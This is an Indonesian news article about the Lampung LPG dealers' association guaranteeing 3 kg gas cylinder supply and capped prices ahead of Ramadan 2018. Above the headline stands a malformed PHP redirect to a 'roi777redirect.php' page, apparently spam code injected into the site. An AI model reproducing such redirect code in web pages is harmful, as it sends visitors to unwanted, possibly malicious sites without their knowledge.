header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Hiswanamigas Jamin Ramadhan Gas Melon Aman -
Hiswanamigas Jamin Ramadhan Gas Melon Aman

TRANSLAMPUNG.COM, BANDARLAMPUNG – DPC Himpunan Wiraswasta Nasional Minyak dan Gas (Hiswanamigas) Lampung menjamin baik ketersediaan stok gas melon dan jaminan harga sesuai Harga Eceran Tertinggi (HET) jelang ramadhan dan idul fitri.

Kabid Elpiji DPC Hiswanamigas Lampung Adi Candra mengatakan, untuk jaminan stok bisa dipastikan aman. Sebab, kuota yang disediakan oleh pemerintah pusat untuk lampung tahun 2018 meningkat yakni sebanyak 172.640 metrik ton (MT). Sementara di tahun 2017 sebanyak 169.000 MT.

“Untuk stok kita berani jamin tidak ada persoalan,” ujarnya kepada radarlampung.co.id (Group Trans Lampung) saat di kantor Hiswanamigas Lampung, Rabu (4/4).

Soal jaminan harga tidak melebihi HET di Agen dan Pangkalan, dia mengatakan hal tersebut juga akan dilakukan sebab keterkaitan dengan stok yang cukup juga berpengaruh terhadap kestabilan harga.

“Sebab malah kalau jelang ramadhan bisa dibilang malah tidak laku. Ditambah lagi kita juga terlibat dalam gelar Operasi Pasar (OP),” kata dia.

Soal penjualan diatas HET dia mengatakan koordinasi dengan Pertamina, hanya bisa dilakukan ditataran pangkalan dan agen saja. “Yang menjadi persoalan adalah, dimana di pedagang eceran atau di warung-warung. Nah, ini juga yang kami minta kesadarannya. Untuk yang HET ini mengacu pada Pergub radius 60 km dari SPBE jika lebih mengacu kepada SK Bupati atau Walikota,” kata dia. (abd/ang/tnn)

News Reporter